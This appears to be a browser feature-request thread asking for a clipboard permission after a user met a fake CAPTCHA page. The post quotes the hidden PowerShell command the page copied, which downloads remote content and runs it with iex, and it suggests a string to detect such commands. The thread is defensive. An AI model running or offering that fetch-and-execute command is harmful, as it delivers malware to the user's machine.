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Status: New idea

Add a new setting on the Permissions section titled Clipboard with a copy icon

Why? Yesterday, i was redirected to a website with a fake "captcha" to prove I'm not a robot the instructions said to press `win + r`, then `ctrl v`, then `enter`. I didn't fall for it, but i did find it annoying that i copied something to the clipboard without me asking it to do so.

The website has been taken down but it was:


And what it copied to my clipboard was: ยก Do Not run the following command !

powershell.exe -W Hidden -command $url = ''; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text

Maybe add detection of unwanted use of the clipboard by checking if the user had performed a click before infomation was copied to the clipboard. Or detect whenever a copied text contains "Hidden -command $url" and replace the entire copied text with "malicious text was copied to clipboard" tho this might be inconvenient for developers somehow.

Here's a visual example of the new permission setting:


Status changed to: New idea
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just a notification that something was inserted into the clipboard buffer seems useful. There are already a bunch of settings related to clipboard handeling especially the new AsyncClipboard ... maybe just making the clipboard access a requestable permission like location, microphon, ... would be a good idea, then users will have to confirm the access.

New member
